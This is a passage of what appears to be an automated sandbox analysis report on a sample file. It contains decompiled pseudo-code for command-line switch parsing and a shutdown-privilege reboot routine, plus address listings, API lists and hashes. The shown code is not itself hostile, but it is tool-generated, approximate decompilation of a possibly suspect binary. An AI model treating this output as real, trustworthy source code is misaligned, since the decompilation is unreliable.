																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x10b9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x10b9a2c =  *0x10b9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x10b8d48 =  *0x10b8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x10b9a2c =  *0x10b9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x10b9a2c =  *0x10b9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x10b8d48 =  *0x10b8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x10b9a2c =  *0x10b9a2c | 0x00000004;
																										L70:
																										 *0x10b8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x10b9a2c = 3;
																	 *0x10b8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x10b8a2c != 0 &&  *0x10b8b3e == 0) {
						if(GetModuleFileNameA( *0x10b9a3c, 0x10b8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E010B66C8(0x10b8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                                                    0x010b5c9e
                                                                                                                                                                                                                                    0x010b5ca9
                                                                                                                                                                                                                                    0x010b5cb0
                                                                                                                                                                                                                                    0x010b5cb3
                                                                                                                                                                                                                                    0x010b5cb6
                                                                                                                                                                                                                                    0x010b5cb7
                                                                                                                                                                                                                                    0x010b5cb8
                                                                                                                                                                                                                                    0x010b5cbd
                                                                                                                                                                                                                                    0x010b6204
                                                                                                                                                                                                                                    0x010b5ccb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5ccb
                                                                                                                                                                                                                                    0x010b5cd3
                                                                                                                                                                                                                                    0x010b5cd7
                                                                                                                                                                                                                                    0x010b5cf4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5cf4
                                                                                                                                                                                                                                    0x010b5cf8
                                                                                                                                                                                                                                    0x010b5d00
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d06
                                                                                                                                                                                                                                    0x010b5d06
                                                                                                                                                                                                                                    0x010b5d0e
                                                                                                                                                                                                                                    0x010b5d10
                                                                                                                                                                                                                                    0x010b5d12
                                                                                                                                                                                                                                    0x010b5d14
                                                                                                                                                                                                                                    0x010b5d15
                                                                                                                                                                                                                                    0x010b5d17
                                                                                                                                                                                                                                    0x010b5d49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d19
                                                                                                                                                                                                                                    0x010b5d19
                                                                                                                                                                                                                                    0x010b5d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d3f
                                                                                                                                                                                                                                    0x010b5d3f
                                                                                                                                                                                                                                    0x010b5d4b
                                                                                                                                                                                                                                    0x010b5d4b
                                                                                                                                                                                                                                    0x010b5d4f
                                                                                                                                                                                                                                    0x010b5d8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d93
                                                                                                                                                                                                                                    0x010b5d93
                                                                                                                                                                                                                                    0x010b5d9a
                                                                                                                                                                                                                                    0x010b5d9d
                                                                                                                                                                                                                                    0x010b5d9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d9e
                                                                                                                                                                                                                                    0x010b5d51
                                                                                                                                                                                                                                    0x010b5d5b
                                                                                                                                                                                                                                    0x010b5d72
                                                                                                                                                                                                                                    0x010b60fb
                                                                                                                                                                                                                                    0x010b60fb
                                                                                                                                                                                                                                    0x010b6207
                                                                                                                                                                                                                                    0x010b620a
                                                                                                                                                                                                                                    0x010b620b
                                                                                                                                                                                                                                    0x010b620e
                                                                                                                                                                                                                                    0x010b6217
                                                                                                                                                                                                                                    0x010b5d78
                                                                                                                                                                                                                                    0x010b5d78
                                                                                                                                                                                                                                    0x010b5d80
                                                                                                                                                                                                                                    0x010b5d83
                                                                                                                                                                                                                                    0x010b5d84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d84
                                                                                                                                                                                                                                    0x010b5d5d
                                                                                                                                                                                                                                    0x010b5d5f
                                                                                                                                                                                                                                    0x010b5d62
                                                                                                                                                                                                                                    0x010b5d68
                                                                                                                                                                                                                                    0x010b5d64
                                                                                                                                                                                                                                    0x010b5d64
                                                                                                                                                                                                                                    0x010b5d64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d62
                                                                                                                                                                                                                                    0x010b5d5b
                                                                                                                                                                                                                                    0x010b5d4f
                                                                                                                                                                                                                                    0x010b5d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d9f
                                                                                                                                                                                                                                    0x010b5d9f
                                                                                                                                                                                                                                    0x010b5da5
                                                                                                                                                                                                                                    0x010b5dab
                                                                                                                                                                                                                                    0x010b5dba
                                                                                                                                                                                                                                    0x010b6218
                                                                                                                                                                                                                                    0x010b621d
                                                                                                                                                                                                                                    0x010b6220
                                                                                                                                                                                                                                    0x010b6221
                                                                                                                                                                                                                                    0x010b6229
                                                                                                                                                                                                                                    0x010b6230
                                                                                                                                                                                                                                    0x010b6247
                                                                                                                                                                                                                                    0x010b626a
                                                                                                                                                                                                                                    0x010b6272
                                                                                                                                                                                                                                    0x010b6249
                                                                                                                                                                                                                                    0x010b6255
                                                                                                                                                                                                                                    0x010b625f
                                                                                                                                                                                                                                    0x010b6264
                                                                                                                                                                                                                                    0x010b6264
                                                                                                                                                                                                                                    0x010b6284
                                                                                                                                                                                                                                    0x010b5dc0
                                                                                                                                                                                                                                    0x010b5dc0
                                                                                                                                                                                                                                    0x010b5dca
                                                                                                                                                                                                                                    0x010b5e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5dcc
                                                                                                                                                                                                                                    0x010b5dce
                                                                                                                                                                                                                                    0x010b5e24
                                                                                                                                                                                                                                    0x010b5e24
                                                                                                                                                                                                                                    0x010b5e2c
                                                                                                                                                                                                                                    0x010b5e47
                                                                                                                                                                                                                                    0x010b5e4a
                                                                                                                                                                                                                                    0x010b61d2
                                                                                                                                                                                                                                    0x010b61e2
                                                                                                                                                                                                                                    0x010b61e7
                                                                                                                                                                                                                                    0x010b61ee
                                                                                                                                                                                                                                    0x010b61f1
                                                                                                                                                                                                                                    0x010b61f1
                                                                                                                                                                                                                                    0x010b61f8
                                                                                                                                                                                                                                    0x010b61f8
                                                                                                                                                                                                                                    0x010b5e50
                                                                                                                                                                                                                                    0x010b5e53
                                                                                                                                                                                                                                    0x010b6109
                                                                                                                                                                                                                                    0x010b611f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6125
                                                                                                                                                                                                                                    0x010b6137
                                                                                                                                                                                                                                    0x010b613a
                                                                                                                                                                                                                                    0x010b613c
                                                                                                                                                                                                                                    0x010b613e
                                                                                                                                                                                                                                    0x010b613e
                                                                                                                                                                                                                                    0x010b6141
                                                                                                                                                                                                                                    0x010b6141
                                                                                                                                                                                                                                    0x010b6143
                                                                                                                                                                                                                                    0x010b6144
                                                                                                                                                                                                                                    0x010b614a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6150
                                                                                                                                                                                                                                    0x010b6152
                                                                                                                                                                                                                                    0x010b615c
                                                                                                                                                                                                                                    0x010b6170
                                                                                                                                                                                                                                    0x010b6172
                                                                                                                                                                                                                                    0x010b617c
                                                                                                                                                                                                                                    0x010b6190
                                                                                                                                                                                                                                    0x010b6190
                                                                                                                                                                                                                                    0x010b6196
                                                                                                                                                                                                                                    0x010b61a5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b61ab
                                                                                                                                                                                                                                    0x010b61b9
                                                                                                                                                                                                                                    0x010b61c6
                                                                                                                                                                                                                                    0x010b61c6
                                                                                                                                                                                                                                    0x010b617e
                                                                                                                                                                                                                                    0x010b6180
                                                                                                                                                                                                                                    0x010b618a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b618a
                                                                                                                                                                                                                                    0x010b615e
                                                                                                                                                                                                                                    0x010b6160
                                                                                                                                                                                                                                    0x010b616a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b616a
                                                                                                                                                                                                                                    0x010b615c
                                                                                                                                                                                                                                    0x010b614a
                                                                                                                                                                                                                                    0x010b610b
                                                                                                                                                                                                                                    0x010b610e
                                                                                                                                                                                                                                    0x010b610e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e59
                                                                                                                                                                                                                                    0x010b5e59
                                                                                                                                                                                                                                    0x010b5e5c
                                                                                                                                                                                                                                    0x010b604f
                                                                                                                                                                                                                                    0x010b6056
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b605c
                                                                                                                                                                                                                                    0x010b606e
                                                                                                                                                                                                                                    0x010b6071
                                                                                                                                                                                                                                    0x010b6073
                                                                                                                                                                                                                                    0x010b6075
                                                                                                                                                                                                                                    0x010b6075
                                                                                                                                                                                                                                    0x010b6078
                                                                                                                                                                                                                                    0x010b6078
                                                                                                                                                                                                                                    0x010b607a
                                                                                                                                                                                                                                    0x010b607b
                                                                                                                                                                                                                                    0x010b6081
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6087
                                                                                                                                                                                                                                    0x010b6087
                                                                                                                                                                                                                                    0x010b608d
                                                                                                                                                                                                                                    0x010b609c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b60a2
                                                                                                                                                                                                                                    0x010b60aa
                                                                                                                                                                                                                                    0x010b60b2
                                                                                                                                                                                                                                    0x010b60b7
                                                                                                                                                                                                                                    0x010b60bd
                                                                                                                                                                                                                                    0x010b60bf
                                                                                                                                                                                                                                    0x010b60bf
                                                                                                                                                                                                                                    0x010b60d6
                                                                                                                                                                                                                                    0x010b60e0
                                                                                                                                                                                                                                    0x010b60e7
                                                                                                                                                                                                                                    0x010b60f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b60f5
                                                                                                                                                                                                                                    0x010b609c
                                                                                                                                                                                                                                    0x010b6081
                                                                                                                                                                                                                                    0x010b5e62
                                                                                                                                                                                                                                    0x010b5e62
                                                                                                                                                                                                                                    0x010b5e65
                                                                                                                                                                                                                                    0x010b5fd3
                                                                                                                                                                                                                                    0x010b5fe9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5fef
                                                                                                                                                                                                                                    0x010b5fef
                                                                                                                                                                                                                                    0x010b5ff7
                                                                                                                                                                                                                                    0x010b5ffd
                                                                                                                                                                                                                                    0x010b6003
                                                                                                                                                                                                                                    0x010b6006
                                                                                                                                                                                                                                    0x010b6011
                                                                                                                                                                                                                                    0x010b6014
                                                                                                                                                                                                                                    0x010b603d
                                                                                                                                                                                                                                    0x010b6016
                                                                                                                                                                                                                                    0x010b6018
                                                                                                                                                                                                                                    0x010b6019
                                                                                                                                                                                                                                    0x010b601b
                                                                                                                                                                                                                                    0x010b6033
                                                                                                                                                                                                                                    0x010b601d
                                                                                                                                                                                                                                    0x010b6020
                                                                                                                                                                                                                                    0x010b6029
                                                                                                                                                                                                                                    0x010b6022
                                                                                                                                                                                                                                    0x010b6022
                                                                                                                                                                                                                                    0x010b6022
                                                                                                                                                                                                                                    0x010b6020
                                                                                                                                                                                                                                    0x010b601b
                                                                                                                                                                                                                                    0x010b6042
                                                                                                                                                                                                                                    0x010b6044
                                                                                                                                                                                                                                    0x010b6046
                                                                                                                                                                                                                                    0x010b604a
                                                                                                                                                                                                                                    0x010b5ff7
                                                                                                                                                                                                                                    0x010b5fd5
                                                                                                                                                                                                                                    0x010b5fd8
                                                                                                                                                                                                                                    0x010b5fd8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e6b
                                                                                                                                                                                                                                    0x010b5e6b
                                                                                                                                                                                                                                    0x010b5e6e
                                                                                                                                                                                                                                    0x010b5f8b
                                                                                                                                                                                                                                    0x010b5f99
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5f9f
                                                                                                                                                                                                                                    0x010b5fa7
                                                                                                                                                                                                                                    0x010b5faf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5fb1
                                                                                                                                                                                                                                    0x010b5fb3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5fb5
                                                                                                                                                                                                                                    0x010b5fb7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5fb9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5fb9
                                                                                                                                                                                                                                    0x010b5fb7
                                                                                                                                                                                                                                    0x010b5fb3
                                                                                                                                                                                                                                    0x010b5faf
                                                                                                                                                                                                                                    0x010b5f8d
                                                                                                                                                                                                                                    0x010b5f8d
                                                                                                                                                                                                                                    0x010b5f8d
                                                                                                                                                                                                                                    0x010b5f8f
                                                                                                                                                                                                                                    0x010b5fc1
                                                                                                                                                                                                                                    0x010b5fc1
                                                                                                                                                                                                                                    0x010b5fc1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e74
                                                                                                                                                                                                                                    0x010b5e74
                                                                                                                                                                                                                                    0x010b5e77
                                                                                                                                                                                                                                    0x010b5ea0
                                                                                                                                                                                                                                    0x010b5ebd
                                                                                                                                                                                                                                    0x010b5f79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5f7f
                                                                                                                                                                                                                                    0x010b5ec3
                                                                                                                                                                                                                                    0x010b5ec3
                                                                                                                                                                                                                                    0x010b5ecc
                                                                                                                                                                                                                                    0x010b5ed4
                                                                                                                                                                                                                                    0x010b5ed6
                                                                                                                                                                                                                                    0x010b5edc
                                                                                                                                                                                                                                    0x010b5edf
                                                                                                                                                                                                                                    0x010b5eea
                                                                                                                                                                                                                                    0x010b5eed
                                                                                                                                                                                                                                    0x010b5f3f
                                                                                                                                                                                                                                    0x010b5f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5eef
                                                                                                                                                                                                                                    0x010b5eef
                                                                                                                                                                                                                                    0x010b5ef2
                                                                                                                                                                                                                                    0x010b5f34
                                                                                                                                                                                                                                    0x010b5ef4
                                                                                                                                                                                                                                    0x010b5ef4
                                                                                                                                                                                                                                    0x010b5ef7
                                                                                                                                                                                                                                    0x010b5f2b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5ef9
                                                                                                                                                                                                                                    0x010b5ef9
                                                                                                                                                                                                                                    0x010b5efc
                                                                                                                                                                                                                                    0x010b5f22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5efe
                                                                                                                                                                                                                                    0x010b5eff
                                                                                                                                                                                                                                    0x010b5f02
                                                                                                                                                                                                                                    0x010b5f16
                                                                                                                                                                                                                                    0x010b5f04
                                                                                                                                                                                                                                    0x010b5f07
                                                                                                                                                                                                                                    0x010b5f0d
                                                                                                                                                                                                                                    0x010b5f46
                                                                                                                                                                                                                                    0x010b5f46
                                                                                                                                                                                                                                    0x010b5f09
                                                                                                                                                                                                                                    0x010b5f09
                                                                                                                                                                                                                                    0x010b5f09
                                                                                                                                                                                                                                    0x010b5f07
                                                                                                                                                                                                                                    0x010b5f02
                                                                                                                                                                                                                                    0x010b5efc
                                                                                                                                                                                                                                    0x010b5ef7
                                                                                                                                                                                                                                    0x010b5ef2
                                                                                                                                                                                                                                    0x010b5f4c
                                                                                                                                                                                                                                    0x010b5f4e
                                                                                                                                                                                                                                    0x010b5f50
                                                                                                                                                                                                                                    0x010b5f54
                                                                                                                                                                                                                                    0x010b5ed4
                                                                                                                                                                                                                                    0x010b5ea2
                                                                                                                                                                                                                                    0x010b5ea4
                                                                                                                                                                                                                                    0x010b5eaf
                                                                                                                                                                                                                                    0x010b5eaf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e79
                                                                                                                                                                                                                                    0x010b5e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e83
                                                                                                                                                                                                                                    0x010b5e83
                                                                                                                                                                                                                                    0x010b5e83
                                                                                                                                                                                                                                    0x010b5e85
                                                                                                                                                                                                                                    0x010b5e85
                                                                                                                                                                                                                                    0x010b5e8e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e94
                                                                                                                                                                                                                                    0x010b5e8e
                                                                                                                                                                                                                                    0x010b5e7d
                                                                                                                                                                                                                                    0x010b5e77
                                                                                                                                                                                                                                    0x010b5e6e
                                                                                                                                                                                                                                    0x010b5e65
                                                                                                                                                                                                                                    0x010b5e5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5dd0
                                                                                                                                                                                                                                    0x010b5dd0
                                                                                                                                                                                                                                    0x010b5dd0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5dd0
                                                                                                                                                                                                                                    0x010b5dce
                                                                                                                                                                                                                                    0x010b5dca
                                                                                                                                                                                                                                    0x010b5dba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d00
                                                                                                                                                                                                                                    0x010b5dd9
                                                                                                                                                                                                                                    0x010b5e04
                                                                                                                                                                                                                                    0x010b61fe
                                                                                                                                                                                                                                    0x010b5e0a
                                                                                                                                                                                                                                    0x010b5e0c
                                                                                                                                                                                                                                    0x010b5e17
                                                                                                                                                                                                                                    0x010b5e17
                                                                                                                                                                                                                                    0x010b5e04
                                                                                                                                                                                                                                    0x010b6200
                                                                                                                                                                                                                                    0x010b6200
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 010B5CEE
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(010B8B3E,00000104,00000000,?,?), ref: 010B5DFC
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 010B5E3E
                                                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 010B5EE1
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010B5F6F
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 010B5FA7
                                                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 010B6008
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 010B60AA
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,010B1140,00000000,00000040,00000000), ref: 010B61F1
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 010B61F8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                    • Opcode ID: 659d1aa42583b31f1520716c5f717e66031b0d66ec4e3c1a900689dd28924c27
                                                                                                                                                                                                                                    • Instruction ID: 506609a329af40b885101141af8caa9dc78bc83ff989cdde194571b2f077488d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 659d1aa42583b31f1520716c5f717e66031b0d66ec4e3c1a900689dd28924c27
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FD17D71A042455EFFBA9A3C8CC87FA7FF5AB16304F0481EAC6D6D7185D67689828F40
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                                                    			E010B1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x10b9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x10b8004; // 0x72151d89
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E010B44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E010B6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E010B44B9(0, 0x522, 0x10b1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E010B1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                                                    0x010b1f90
                                                                                                                                                                                                                                    0x010b1f90
                                                                                                                                                                                                                                    0x010b1f93
                                                                                                                                                                                                                                    0x010b1f98
                                                                                                                                                                                                                                    0x010b1fa4
                                                                                                                                                                                                                                    0x010b1fa7
                                                                                                                                                                                                                                    0x010b1fc5
                                                                                                                                                                                                                                    0x010b1fcd
                                                                                                                                                                                                                                    0x010b1fdb
                                                                                                                                                                                                                                    0x010b1ee5
                                                                                                                                                                                                                                    0x010b1eea
                                                                                                                                                                                                                                    0x010b1ef1
                                                                                                                                                                                                                                    0x010b1ef4
                                                                                                                                                                                                                                    0x010b1f0c
                                                                                                                                                                                                                                    0x010b1f2e
                                                                                                                                                                                                                                    0x010b1f3a
                                                                                                                                                                                                                                    0x010b1f46
                                                                                                                                                                                                                                    0x010b1f4d
                                                                                                                                                                                                                                    0x010b1f58
                                                                                                                                                                                                                                    0x010b1f60
                                                                                                                                                                                                                                    0x010b1f61
                                                                                                                                                                                                                                    0x010b1f62
                                                                                                                                                                                                                                    0x010b1f75
                                                                                                                                                                                                                                    0x010b1f80
                                                                                                                                                                                                                                    0x010b1f77
                                                                                                                                                                                                                                    0x010b1f77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1f77
                                                                                                                                                                                                                                    0x010b1f64
                                                                                                                                                                                                                                    0x010b1f64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1f64
                                                                                                                                                                                                                                    0x010b1f0e
                                                                                                                                                                                                                                    0x010b1f0e
                                                                                                                                                                                                                                    0x010b1f13
                                                                                                                                                                                                                                    0x010b1f13
                                                                                                                                                                                                                                    0x010b1f14
                                                                                                                                                                                                                                    0x010b1f14
                                                                                                                                                                                                                                    0x010b1f16
                                                                                                                                                                                                                                    0x010b1f17
                                                                                                                                                                                                                                    0x010b1f1a
                                                                                                                                                                                                                                    0x010b1f1f
                                                                                                                                                                                                                                    0x010b1f1f
                                                                                                                                                                                                                                    0x010b1f86
                                                                                                                                                                                                                                    0x010b1f8f
                                                                                                                                                                                                                                    0x010b1fcf
                                                                                                                                                                                                                                    0x010b1fd3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1fd3
                                                                                                                                                                                                                                    0x010b1fa9
                                                                                                                                                                                                                                    0x010b1fb4
                                                                                                                                                                                                                                    0x010b1fbb
                                                                                                                                                                                                                                    0x010b1fc3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1fc3
                                                                                                                                                                                                                                    0x010b1f9a
                                                                                                                                                                                                                                    0x010b1f9a
                                                                                                                                                                                                                                    0x010b1fa2
                                                                                                                                                                                                                                    0x010b1fd9
                                                                                                                                                                                                                                    0x010b1fda
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1fa2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010B1EFB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 010B1F02
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 010B1FD3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                    • Opcode ID: 71b00507d17e549065567557d0764ccb40accadfa537c4ed9353de51c1b5ee58
                                                                                                                                                                                                                                    • Instruction ID: 41a1c18012f8f42f14170d7976bcd1d39797439c94fe1ac3c57e1ea55b7aa5c0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71b00507d17e549065567557d0764ccb40accadfa537c4ed9353de51c1b5ee58
